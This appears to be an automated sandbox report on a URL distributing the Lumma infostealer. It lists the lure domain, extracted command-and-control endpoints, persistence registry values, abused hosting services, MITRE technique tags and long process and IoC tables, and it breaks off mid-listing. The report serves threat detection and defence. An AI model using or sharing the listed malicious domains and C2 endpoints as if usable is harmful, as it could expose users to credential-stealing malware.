lumma | hxxps://epsil1[.]pro

Analysis

max time kernel
283s
max time network
294s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09-01-2025 08:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://epsil1.pro

Score

10^/10

lumma discovery execution persistence phishing stealer

Malware Config

Extracted

Family

lumma

https://robinsharez.shop/api

https://handscreamny.shop/api

https://chipdonkeruz.shop/api

https://versersleep.shop/api

https://crowdwarek.shop/api

https://apporholis.shop/api

https://femalsabler.shop/api

https://soundtappysk.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 3 IoCs

flow	pid	Process
57	1852	powershell.exe
58	1852	powershell.exe
59	4124	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5052	powershell.exe
1852	powershell.exe
3520	powershell.exe
4512	powershell.exe
2780	powershell.exe
2348	powershell.exe
4124	powershell.exe
4660	powershell.exe
4644	powershell.exe
4084	powershell.exe
2480	powershell.exe
2840	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 5 IoCs

pid	Process
1312	Epsilon.exe
3428	Epsilon.exe
992	Epsilon.exe
3944	Epsilon.exe
4684	Epsilon.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Epsilon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Epsilon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Epsilon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Epsilon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Epsilon.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

flow	ioc
61	raw.githubusercontent.com
62	raw.githubusercontent.com
63	raw.githubusercontent.com
64	bitbucket.org
68	bitbucket.org
66	bitbucket.org
67	bitbucket.org
69	bitbucket.org
2	raw.githubusercontent.com
4	bitbucket.org
57	bitbucket.org
59	raw.githubusercontent.com
60	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	cmd.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Epsilon.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
3368	msedge.exe
3368	msedge.exe
3336	msedge.exe
3336	msedge.exe
3540	msedge.exe
3540	msedge.exe
3896	msedge.exe
3896	msedge.exe
1448	identity_helper.exe
1448	identity_helper.exe
3764	msedge.exe
3764	msedge.exe
4596	msedge.exe
4596	msedge.exe
4008	identity_helper.exe
4008	identity_helper.exe
928	msedge.exe
928	msedge.exe
5052	powershell.exe
5052	powershell.exe
1852	powershell.exe
1852	powershell.exe
3520	powershell.exe
3520	powershell.exe
4124	powershell.exe
4124	powershell.exe
4660	powershell.exe
4660	powershell.exe
4512	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	4308	7zG.exe
Token: 35	4308	7zG.exe
Token: SeSecurityPrivilege	4308	7zG.exe
Token: SeSecurityPrivilege	4308	7zG.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
4308	7zG.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
3336	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe
4596	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3336 wrote to memory of 4376	3336	msedge.exe	78
PID 3336 wrote to memory of 4376	3336	msedge.exe	78
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 4624	3336	msedge.exe	79
PID 3336 wrote to memory of 3368	3336	msedge.exe	80
PID 3336 wrote to memory of 3368	3336	msedge.exe	80
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81
PID 3336 wrote to memory of 3172	3336	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://epsil1.pro
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc4c2a3cb8,0x7ffc4c2a3cc8,0x7ffc4c2a3cd8
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6180 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3896
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17851527572800142299,55757180185423474,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1584

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5116

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Epsilon\" -ad -an -ai#7zMap6787:76:7zEvent11981
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc4c2a3cb8,0x7ffc4c2a3cc8,0x7ffc4c2a3cd8
  2⤵
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1836 /prefetch:2
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
  2⤵
  PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:3736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1
  2⤵
  PID:2452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
